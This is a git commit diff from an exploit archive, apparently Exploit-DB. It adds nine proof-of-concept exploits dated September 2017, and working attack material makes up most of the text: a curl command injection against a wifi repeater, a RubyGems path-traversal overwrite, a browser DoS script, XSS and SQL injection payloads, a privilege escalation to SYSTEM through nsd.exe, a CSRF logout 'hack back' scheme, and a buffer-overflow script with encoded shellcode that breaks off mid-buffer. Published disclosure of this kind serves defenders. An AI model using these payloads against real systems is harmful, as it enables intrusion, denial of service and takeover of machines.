DB: 2017-09-05

9 new exploits IBM Notes 8.5.x/9.0.x - Denial of Service (2) Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation RubyGems < 2.6.13 - Arbitrary File Overwrite Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection Joomla! Component CheckList 1.1.0 - SQL Injection Wireless Repeater BE126 - Remote Code Execution CodeMeter 6.50 - Cross-Site Scripting Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery
2017-09-05 05:01:31 +00:00 · 2017-09-05 05:01:31 +00:00 · 427165968d
commit 427165968d
parent 8f3c450a42
10 changed files with 634 additions and 0 deletions
--- a/files.csv
+++ b/files.csv
@ -2011,6 +2011,7 @@ id,file,description,date,author,platform,type,port
 17712,platforms/windows/dos/17712.txt,"Adobe Photoshop CS5 - '.gif' Remote Code Execution",2011-08-22,"Francis Provencher",windows,dos,0
 17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - '.m3u' Local Buffer Overflow (PoC)",2011-08-26,"D3r K0n!G",windows,dos,0
 17742,platforms/windows/dos/17742.py,"Mini FTP Server 1.1 - Buffer Corruption Remote Denial of Service",2011-08-28,LiquidWorm,windows,dos,0
+42604,platforms/multiple/dos/42604.html,"IBM Notes 8.5.x/9.0.x - Denial of Service (2)",2017-08-31,"Dhiraj Mishra",multiple,dos,0
 17769,platforms/linux/dos/17769.c,"Linux Kernel 3.0.0 - 'perf_count_sw_cpu_clock' event Denial of Service",2011-09-01,"Vince Weaver",linux,dos,0
 17772,platforms/windows/dos/17772.txt,"BroadWin Webaccess Client - Multiple Vulnerabilities",2011-09-02,"Luigi Auriemma",windows,dos,0
 17781,platforms/windows/dos/17781.pl,"World Of Warcraft - 'chat-cache.txt' Local Stack Overflow Denial of Service",2011-09-05,"BSOD Digital",windows,dos,0
@ -9224,6 +9225,9 @@ id,file,description,date,author,platform,type,port
 42568,platforms/windows/local/42568.py,"Easy RM RMVB to DVD Burner 1.8.11 - Buffer Overflow (SEH)",2017-08-28,"Touhid M.Shaikh",windows,local,0
 42586,platforms/windows/local/42586.py,"Easy Vedio to PSP Converter 1.6.20 - Buffer Overflow (SEH)",2017-08-28,"Kishan Sharma",windows,local,0
 42601,platforms/android/local/42601.txt,"Motorola Bootloader - Kernel Cmdline Injection Secure Boot and Device Locking Bypass",2017-09-01,"Roee Hay",android,local,0
+42605,platforms/windows/local/42605.txt,"Lotus Notes Diagnostic Tool 8.5/9.0 - Privilege Escalation",2017-09-02,ParagonSec,windows,local,0
+42611,platforms/linux/local/42611.txt,"RubyGems < 2.6.13 - Arbitrary File Overwrite",2017-09-04,mame,linux,local,0
+42612,platforms/windows/local/42612.py,"Dup Scout Enterprise 9.9.14 - 'Input Directory' Local Buffer Overflow",2017-09-04,"Touhid M.Shaikh",windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@ -38386,3 +38390,8 @@ id,file,description,date,author,platform,type,port
 42597,platforms/php/webapps/42597.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.6 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42598,platforms/php/webapps/42598.txt,"Joomla! Component Huge-IT Portfolio Gallery Plugin 1.0.7 - SQL Injection",2017-08-31,"Larry W. Cashdollar",php,webapps,0
 42603,platforms/php/webapps/42603.txt,"FineCMS 1.0  - Multiple Vulnerabilities",2017-08-29,sohaip-hackerDZ,php,webapps,0
+42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
+42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0
+42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0
+42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0
+42613,platforms/multiple/webapps/42613.txt,"Symantec Messaging Gateway < 10.6.3-267 - Cross-Site Request Forgery",2017-08-09,"Dhiraj Mishra",multiple,webapps,0
--- a/platforms/hardware/webapps/42608.txt
+++ b/platforms/hardware/webapps/42608.txt
@ -0,0 +1,33 @@
+# Exploit Title:  WIFI Repeater BE126 – Remote Code Execution
+# Date Publish: 09/09/2017
+# Exploit Authors: Hay Mizrachi, Omer Kaspi
+
+# Contact: haymizrachi@gmail.com, komerk0@gmail.com
+# Vendor Homepage: http://www.twsz.com
+# Category: Webapps
+# Version: 1.0
+# Tested on: Windows/Ubuntu 16.04
+
+# CVE: CVE-2017-13713
+
+1 - Description:
+
+HTTP POST request that contains user parmater which can give us to run
+Remote Code Execution to the device.
+The parameter is not sanitized at all, which cause him to be vulnerable.
+
+
+2 - Proof of Concept:
+
+curl -d "name=HTTP&url="http://www.test.com&user=;echo hacked!! >
+/var/mycode;&password=a&port=8&dir=a"
+--cookie "Cookie: sessionsid=XXXXX; auth=ok expires=Sun, 15-May-2112
+01:45:46 GMT; langmanulset=yes;
+sys_UserName=admin; expires=Mon, 31-Jan-2112 16:00:00 GMT; language=en_us"
+-X POST http://beconnected.client/cgi-bin/webupg
+
+3 - Timeline:
+
+29/4/2017 – Vulnerability Discovered.
+29/4/2017 - Vendor not responding.
+03/09/2017 – Exploit published.
--- a/platforms/linux/local/42611.txt
+++ b/platforms/linux/local/42611.txt
@ -0,0 +1,30 @@
+There is no check for name field in metadata.gz. By assigning a maliciously crafted string like ../../../../../any/where to the field, an attacker can create an arbitrary file out of the directory of the gem, or even replace an existing file with a malicious file.
+
+Proof of Concept 1: Create a file anywhere
+
+This PoC attempts to create a file /tmp/malicious-0/BOOOOM.
+
+1) Download the attached file malicious.gem.
+2) Run gem install malicious.gem --no-doc.
+3) /tmp/malicious-0/BOOOOM should be created.
+
+malicious.gem assigns ../../../../../../../../../../tmp/malicious as name field. This attack is relatively weak since the path must include a directory named <name>-<version>, such as malicious-0. Still, there are many chances that cause a catastrophe. For example, think of replacing a file in /etc/dbus-1/.
+
+Proof of Concept 2: Replace rackup command
+
+This PoC attempts to replace gems/rack-2.0.3/bin/rackup with a malicious file.
+
+1) Download the attached file replace-rackup.gem.
+2) Run gem install rack -v 2.0.3.
+3) Run gem install replace-rackup.gem --no-doc.
+4) Run rackup. It will emit just BOOOOM!.
+
+replace-rackup.gem assigns ../gems/rack as name field, and contains a malicious file bin/rackup. This is really exploitable for attackers.
+
+Note
+
+For how to create the malicious gems, see the attached file src.tar.gz.
+
+
+Proof of Concept:
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/42611.zip
--- a/platforms/multiple/dos/42604.html
+++ b/platforms/multiple/dos/42604.html
@ -0,0 +1,42 @@
+# Exploit Title: IBM Notes is affected by a denial of service vulnerability
+# Date: 31 August 2017
+# Software Link: http://www-01.ibm.com/support/docview.wss?uid=swg21999384
+# Exploit Author: Dhiraj Mishra 
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-1130
+# Category:  IBM Notes (Console Application)
+ 
+ 
+1. Description
+ 
+IBM Notes is vulnerable to a denial of service involving persuading a user to click on a malicious link, which would ultimately cause the client to have to be restarted. 
+ 
+2. Proof of concept
+ 
+<script>
+var w;
+var wins = {};
+var i = 1;
+f.click();
+setInterval("f.click()", 1);
+setInterval(function(){
+	for (var k in wins) {
+		// after creating window .status = '' (empty string), when the file dialog is displayed its value changes to 'undefined'.
+		if (wins[k] && wins[k].status === undefined) {
+			wins[k].close();
+			delete wins[k];
+		}
+	}
+	w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>');
+	if (w) {
+		wins[i] = w;
+		i++;
+	}
+}, 1);
+</script>
+ 
+ 
+3. IBM Security Bulletin
+ 
+http://www-01.ibm.com/support/docview.wss?uid=swg21999384
--- a/platforms/multiple/webapps/42610.txt
+++ b/platforms/multiple/webapps/42610.txt
@ -0,0 +1,316 @@
+Document Title:
+===============
+Wibu Systems AG CodeMeter 6.50 - Persistent XSS Vulnerability
+
+
+References (Source):
+====================
+https://www.vulnerability-lab.com/get_content.php?id=2074
+
+ID: FB49498
+
+Acknowledgements: https://www.flickr.com/photos/vulnerabilitylab/36912680045/
+
+http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-13754
+
+CVE-ID:
+=======
+CVE-2017-13754
+
+
+Release Date:
+=============
+2017-09-04
+
+
+Vulnerability Laboratory ID (VL-ID):
+====================================
+2074
+
+
+Common Vulnerability Scoring System:
+====================================
+3.5
+
+
+Vulnerability Class:
+====================
+Cross Site Scripting - Persistent
+
+
+Current Estimated Price:
+========================
+500€ - 1.000€
+
+
+Product & Service Introduction:
+===============================
+CodeMeter is the universal technology for software publishers and intelligent device manufacturers, upon which all 
+solutions from Wibu-Systems are built. You want to protect the software you have developed against piracy and 
+reverse engineering. CodeMeter requires your attention only once: its integration in your software and your business 
+workflow is necessary at one point in time only. Protection Suite is the tool that automatically encrypts your 
+applications and libraries. In addition, CodeMeter offers an API for custom integration with your software.
+
+(Copy of the Homepage: http://www.wibu.com/us/codemeter.html )
+
+
+Abstract Advisory Information:
+==============================
+The vulnerability laboratory core research team discovered a persistent input validation vulnerability in the official 
+Wibu Systems CodeMeter WebAdmin v6.50 application.
+
+
+Vulnerability Disclosure Timeline:
+==================================
+2017-05-20: Researcher Notification & Coordination (Benjamin Kunz Mejri - Evolution Security GmbH)
+2017-05-21: Vendor Notification (Wibu Systems AG - Security Department)
+2017-05-22: Vendor Response/Feedback (Wibu Systems AG - Security Department)
+2017-08-01: Vendor Fix/Patch (Wibu Systems AG - Service Developer Team)
+2017-08-20: Security Acknowledgements (Wibu Systems AG - Security Department)
+2017-09-04: Public Disclosure (Vulnerability Laboratory)
+
+
+Discovery Status:
+=================
+Published
+
+
+Affected Product(s):
+====================
+Wibu-Systems AG
+Product: CodeMeter & Control Panel - WebAdmin (Web-Application) 6.50.2624.500
+
+
+Exploitation Technique:
+=======================
+Remote
+
+
+Severity Level:
+===============
+Medium
+
+
+Technical Details & Description:
+================================
+A persistent input validation vulnerability has been discovered in the Wibu Systems AG CodeMeter WebAdmin v6.50 web-server web-application.
+The vulnerability allows remote attackers to inject own malicious script code with application-side vector to the vulnerable function or 
+module to followup with a compromising attack.
+
+The input validation vulnerability has been discovered in the `server name` input field of the `advanced settings - time server` module.
+The request method to inject is POST and the attack vector is located on the application-side. First the attacker injects the payload and 
+after it the POST request is performed to save the content permanently. After that the issue triggers on each visit an execution. The basic 
+validation in the application is well setup but in case of the advanced settings the validation parameter are still not implemented to secure 
+the function at all. The vulnerability is a classic filter input validation vulnerability. The application has no cookies and therefore the 
+attack risk is more minor but not that less then to ignore it. The vulnerable files are `ChangeConfiguration.html`, `time_server_list.html` 
+and `certified_time.html`. The `ChangeConfiguration.html` is marked as injection point for the payload. The `time_server_list.html` and 
+`certified_time.html` files are mared with the execution point of the issue.
+
+The security issue was uncovered during the blurrybox hacking contest of the wibu systems ag and acknowledged by the management.
+
+The security risk of the persistent input validation issue is estimated as medium with a cvss (common vulnerability scoring system) count of 3.5.
+Exploitation of the persistent input validation web vulnerability requires low user interaction and a privileged web-application user account.
+Successful exploitation of the vulnerability results in persistent phishing attacks, persistent external redirects to malicious sources and 
+persistent manipulation of affected or connected application modules.
+
+
+Request Method(s):
+[+] POST
+
+Vulnerable Module(s):
+[+] Advanced Settings - Time Server
+
+Vulnerable File(s):
+[+] ChangeConfiguration.html
+
+Vulnerable Parameter(s):
+[+] server name
+
+Affected Module(s):
+[+] time_server_list.html
+[+] certified_time.html
+
+
+Proof of Concept (PoC):
+=======================
+The persistent input validation vulnerability can be exploited by remote attackers with privileged user account and with low user interaction.
+For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
+
+
+Manual steps to reproduce the vulnerability ...
+1. Start the CodeMeter software
+2. Open the webadmin gui
+3. Move to advanced settings
+4. Open the time-server module
+5. Click the plus to add a new time server
+Note: The request method is POST
+6. Inject a test script code payload with matching domain and save via POST
+7. The code is saved and executes of the dbms in the time-server list module index
+8. Successful reproduce of the vulnerability!
+
+Note: The method can be automated by usage of post method requester to include a payload.
+
+
+PoC: Payload (Exploitation)
+cmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>
+cmtime.codehacker.de/>"<iframe src="evil.source" onload=alert("GUTENMORGEN")>
+
+
+
+PoC: Vulnerable Source
+<div id="time_server_to_add"><input id="TimeServerId1" name="time_server_list_list" value="cmtime.codemeter.com" 
+type="radio"><label class="time_server_list_list_label" for="TimeServerId1"><span class="ct100_t bld ssl_number_space">1. 
+</span>cmtime.codemeter.com<span class="ssl_up" onclick="onClickSSLUp(this);" style="visibility: hidden;"><span class="fa 
+fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down 
+fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons">
+</span></span></label><input id="TimeServerId3" name="time_server_list_list" value="cmtime.codemeter.de" type="radio">
+<label class="time_server_list_list_label" for="TimeServerId3"><span class="ct100_t bld ssl_number_space">2. </span>cmtime.codemeter.de
+<span class="ssl_up" onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" 
+onclick="onClickSSLDown(this);"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" 
+onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="TimeServerId4" 
+name="time_server_list_list" value="cmtime.codemeter.us" type="radio"><label class="time_server_list_list_label" for="TimeServerId4">
+<span class="ct100_t bld ssl_number_space">3. </span>cmtime.codemeter.us<span class="ssl_up" onclick="onClickSSLUp(this);">
+<span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" onclick="onClickSSLDown(this);" style="visibility: 
+visible;"><span class="fa fa-arrow-down fa-list-buttons"></span></span><span class="ssl_delete" onclick="onClickDelete(this);">
+<span class="fa fa-trash-o fa-list-buttons"></span></span></label><input id="cmtime.codehacker.de/>" <img="" src="evil.source">" 
+type="radio" name="time_server_list_list" value="cmtime.codehacker.de/>"<img src="evil.source">"/><label class="time_server_list_list_label" 
+for="cmtime.codehacker.de/>" <img="" src="evil.source">"><span id="ssl_number_cmtime.codehacker.de/>" <img="" src="evil.source">"[EXECUTABLE PAYLOAD!]
+class="ct100_t bld ssl_number_space"></span>cmtime.codehacker.de/>"<img src="evil.source"><span class="ssl_up" 
+onclick="onClickSSLUp(this);"><span class="fa fa-arrow-up fa-list-buttons"></span></span><span class="ssl_down" 
+onclick="onClickSSLDown(this);" style="visibility: hidden;"><span class="fa fa-arrow-down fa-list-buttons"></span></span>
+<span class="ssl_delete" onclick="onClickDelete(this);"><span class="fa fa-trash-o fa-list-buttons"></span></span></label></div>
+
+
+--- PoC Session Logs (GET) ---
+Status: 200[OK]
+POST http://localhost:22350/actions/ChangeConfiguration.html 
+Load Flags[LOAD_DOCUMENT_URI  LOAD_INITIAL_DOCUMENT_URI  ] Größe des Inhalts[1544] 
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:22350]
+      User-Agent[Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0]
+      Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
+      Content-Type[application/x-www-form-urlencoded]
+      Content-Length[255]
+      Referer[http://localhost:22350/configuration/certified_time.html]
+      Cookie[com.wibu.cm.webadmin.lang=de-DE]
+      Connection[keep-alive]
+      Upgrade-Insecure-Requests[1]
+   POST-Daten:
+      Action[CertifiedTimeConfiguration]
+      TimeServerList[cmtime.codemeter.com%7Ccmtime.codemeter.de%7Ccmtime.codemeter.us%7Ccmtime.codehacker.de/>"<img src="evil.source" onload=alert("GUTENMORGEN")>%7C]
+      SoapTimeOut[20]
+      certified_time_time_out[20]
+      ApplyButton[Apply]
+      WaFormGuard[v0V839tW3xkpa6jC26kYsvZJxe0UFJCl4%2FB2ipA6Xpwv]
+   Response Header:
+      Server[WIBU-SYSTEMS HTTP Server]
+      Date[21 May 2017 16:00:21 +0000]
+      Content-Type[text/html; charset=utf-8]
+      X-Frame-Options[SAMEORIGIN]
+      x-xss-protection[1; mode=block]
+      Accept-Ranges[bytes]
+      Content-Length[1544]
+-
+Status: 200[OK]
+GET http://localhost:22350/configuration/iframe/evil.source[PAYLOAD EXECUTION]
+Load Flags[LOAD_NORMAL] Größe des Inhalts[2320] Mime Type[text/html]
+   Request Header:
+      Host[localhost:22350]
+      User-Agent[zero-zero]
+      Accept[*/*]
+      Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
+      Cookie[com.wibu.cm.webadmin.lang=de-DE]
+      Connection[keep-alive]
+   Response Header:
+      Server[WIBU-SYSTEMS HTTP Server]
+      Date[19 May 2017 21:02:23 +0000]
+      Connection[close]
+      Content-Type[text/html; charset=utf-8]
+      X-Frame-Options[SAMEORIGIN]
+      x-xss-protection[1; mode=block]
+      Accept-Ranges[bytes]
+      Content-Length[2320]
+-
+Status: 200[OK]
+GET http://localhost:22350/configuration/iframe/evil.source 
+Mime Type[text/html]
+   Request Header:
+      Host[localhost:22350]
+      User-Agent[zero-zero]
+      Accept[*/*]
+      Referer[http://localhost:22350/configuration/iframe/time_server_list.html]
+      Cookie[com.wibu.cm.webadmin.lang=de-DE]
+      Connection[keep-alive]
+   Response Header:
+      Server[WIBU-SYSTEMS HTTP Server]
+      Date[19 May 2017 21:06:56 +0000]
+      Connection[close]
+      Content-Type[text/html; charset=utf-8]
+      X-Frame-Options[SAMEORIGIN]
+      x-xss-protection[1; mode=block]
+      X-Content-Type-Options[nosniff]
+      Accept-Ranges[bytes]
+      Content-Length[2320]
+
+
+Reference(s):
+http://localhost:22350/
+http://localhost:22350/configuration/
+http://localhost:22350/configuration/ChangeConfiguration.html
+http://localhost:22350/configuration/certified_time.html
+http://localhost:22350/configuration/time_server_list.html
+
+
+Solution - Fix & Patch:
+=======================
+1. Restrict the input field and disallow the usage of special chars like in the other input fields
+2. Parse the input field and escape the content
+3. Parse in the visible listing the output location of the item
+4. Setup a secure exception-handling to handl illegal events
+5. Include a proper validation mask to the form to prevent further injection attacks
+
+The security vulnerability has been patched in the version 6.50b.
+
+
+Security Risk:
+==============
+The seurity risk of the persistent input validation web vulnerability in the web-server webadmin web-application is estimated as medium (CVSS 3.5).
+Earlier version releases up to codemeter 6.50 may be affected as well by the cross site scripting web vulnerability.
+
+
+Credits & Authors:
+==================
+Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (http://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.)
+
+
+Disclaimer & Information:
+=========================
+The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed or 
+implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable in any 
+case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability Labs or its 
+suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability mainly for incidental
+or consequential damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any licenses, policies, deface 
+websites, hack into databases or trade with stolen data. We have no need for criminal activities or membership requests. We do not publish advisories 
+or vulnerabilities of religious-, militant- and racist- hacker/analyst/researcher groups or individuals. We do not publish trade researcher mails, 
+phone numbers, conversations or anything else to journalists, investigative authorities or private individuals. 
+
+Domains:    www.vulnerability-lab.com		- www.vulnerability-db.com					- www.evolution-sec.com
+Programs:   vulnerability-lab.com/submit.php 	- vulnerability-lab.com/list-of-bug-bounty-programs.php 	- vulnerability-lab.com/register.php
+Feeds:	    vulnerability-lab.com/rss/rss.php 	- vulnerability-lab.com/rss/rss_upcoming.php 			- vulnerability-lab.com/rss/rss_news.php
+Social:	    twitter.com/vuln_lab		- facebook.com/VulnerabilityLab 				- youtube.com/user/vulnerability0lab
+
+Any modified copy or reproduction, including partially usages, of this file, resources or information requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
+Vulnerability Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website is trademark 
+of vulnerability-lab team & the specific authors or managers. To record, list, modify, use or edit our material contact (admin@) to get an ask permission.
+
+				    Copyright © 2017 | Vulnerability Laboratory - [Evolution Security GmbH]™
+
+
+
+-- 
+VULNERABILITY LABORATORY - RESEARCH TEAM
+SERVICE: www.vulnerability-lab.com
+
+
--- a/platforms/multiple/webapps/42613.txt
+++ b/platforms/multiple/webapps/42613.txt
@ -0,0 +1,27 @@
+# Exploit Title: CSRF
+# Date: August 9, 2017	
+# Software Link: https://www.symantec.com/products/messaging-gateway
+# Exploit Author: Dhiraj Mishra
+# Contact: http://twitter.com/mishradhiraj_
+# Website: http://datarift.blogspot.in/
+# CVE: CVE-2017-6328
+# Category:  Symantec Messaging Gateway
+ 
+1. Description
+ 
+The Symantec Messaging Gateway can encounter an issue of cross site request forgery (also known as one-click attack and is abbreviated as CSRF or XSRF), which is a type of malicious exploit of a website where unauthorized commands are transmitted from a user that the web application trusts. A CSRF attack attempts to exploit the trust that a specific website has in a user's browser. 
+ 
+2. Proof of concept
+ 
+The SMG did not protect the logout form with csrf token, therefore i can logout any user by sending this url https://YourIPHere/brightmail/logout.do
+Here's an attack vector:
+
+1) Set up a honeypot that detects SMG scans/attacks (somehow).
+2) Once I get a probe, fire back a logout request.
+3) Continue to logout the active user forever.
+
+It's less damaging than a traditional "hack back" but is sure to irritate the local red team to no end. It's essentially a user DoS.
+ 
+3. Symantec Security Bulletin
+ 
+https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20170810_00
--- a/platforms/php/webapps/42606.txt
+++ b/platforms/php/webapps/42606.txt
@ -0,0 +1,25 @@
+# # # # # 
+# Exploit Title: Joomla! Component Survey Force Deluxe 3.2.4 - SQL Injection
+# Dork: N/A
+# Date: 03.09.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/contacts-and-feedback/surveys/survey-force-deluxe/
+# Demo: http://demo30.joomplace.com/our-products/survey-force-deluxe
+# Version: 3.2.4
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/index.php?option=com_surveyforce&task=start_invited&survey=19&invite=[SQL]
+#
+# Etc..
+# # # # #
--- a/platforms/php/webapps/42607.txt
+++ b/platforms/php/webapps/42607.txt
@ -0,0 +1,29 @@
+# # # # # 
+# Exploit Title: Joomla! Component CheckList 1.1.0 - SQL Injection
+# Dork: N/A
+# Date: 03.09.2017
+# Vendor Homepage: http://joomplace.com/
+# Software Link: https://extensions.joomla.org/extensions/extension/living/personal-life/checklist/
+# Demo: http://checklistdemo.joomplace.com/
+# Version: 1.1.0
+# Category: Webapps
+# Tested on: WiN7_x64/KaLiLinuX_x64
+# CVE: N/A
+# # # # #
+# Exploit Author: Ihsan Sencan
+# Author Web: http://ihsan.net
+# Author Social: @ihsansencan
+# # # # #
+# Description:
+# The vulnerability allows an attacker to inject sql commands....
+# 	
+# Proof of Concept:
+# 
+# http://localhost/[PATH]/[PROFILE][SQL].html
+# http://localhost/[PATH]/[TAG][SQL].html
+# http://localhost/[PATH]/[CHECKLIST][SQL].html
+#
+# our-products/checklist/checklist/tag/social'and+(SeLeCT+1+FrOM+(SeLeCT+count(*),COncaT((SeLeCT(SeLeCT+COncaT(cast(database()+as+char),0x7e))+FrOM+information_schema.tables+where+table_schema=database()+limit+0,1),floor(rand(0)*2))x+FrOM+information_schema.tables+group+by+x)a)+AND+''='.html
+#
+# Etc..
+# # # # #
--- a/platforms/windows/local/42605.txt
+++ b/platforms/windows/local/42605.txt
@ -0,0 +1,36 @@
+# Exploit Title: Lotus Notes Diagnostic Tool (nsd.exe) Privelege Escalation
+# Date: 02-09-2017
+# Exploit Author: ParagonSec
+# Website: https://github.com/paragonsec
+# Version: 8.5 & 9.0
+# Tested on: Windows 7 Enterprise
+# CVE: CVE-2015-0179
+# Vendor CVE URL: http://www-01.ibm.com/support/docview.wss?uid=swg21700029
+# Category: Local & Privilege Escalation Exploit
+
+
+1. Description
+
+Lotus Notes Diagnostic Tool (nsd.exe) runs under NT Authority/System rights. 
+This can be leveraged to run a program under the System context and elevate 
+local privileges.
+
+
+2. Proof of Concept
+
+First you need to execute nsd.exe under the monitor/CLI mode:
+
+> nsd.exe -monitor
+
+Next, after NSD finishes loading you can execute any program under the System context. In this example we will execute CMD.
+
+nsd> LOAD CMD
+
+You will see that cmd is opened as System now.
+
+Also, NSD can be used to attach, kill processes or create memory dumps under the System context.
+
+
+3. Solution:
+
+This has been fixed on release 9.0.1 FP3 and 8.5.3 FP6.
--- a/platforms/windows/local/42612.py
+++ b/platforms/windows/local/42612.py
@ -0,0 +1,87 @@
+#!/usr/bin/python
+
+###############################################################################
+# Exploit Title  : Dup Scout Enterprise v9.9.14 - 'Input Directory' Local
+Buffer Overflow
+# Date           : 04 Sept, 2017
+# Exploit Author : Touhid M.Shaikh - www.touhidshaikh.com
+# Contact        : https://github.com/touhidshaikh
+# Vendor Homepage: http://www.dupscout.com/
+# Version        : v9.9.14
+# Software Link  :
+https://www.exploit-db.com/apps/d83948ebf4c325eb8d56db6d8649d490-dupscoutent_setup_v9.9.14.exe
+# Vuln Software  : Dup Scout Enterprise v9.9.1 (Evaluation)
+# Tested On      : Window 7 (x86)
+################################################################################
+
+
+#========================================================================================================================#
+# TO Reproduce Attack. |
+#========================================================================================================================#
+# To trigger the exploit, click "Search" -> second (+) sign -> "Add Input
+Directory" and paste the content of Dup_Scout_buffer.txt
+#
+# Video PoC : https://www.youtube.com/watch?v=vnA0-HR7PCI
+##########################################################################################################################
+
+
+jmpebx = "\x15\x2c\x18\x65"
+
+#badchars = "\x0a\x0d\x2f"
+
+# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e
+x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
+buf =  ""
+buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
+buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
+buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
+buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
+buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
+buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
+buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
+buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
+buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
+buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
+buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
+buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
+buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
+buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
+buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
+buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
+buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
+buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
+buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
+buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
+buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
+buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
+buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
+buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
+buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
+buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
+buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
+buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
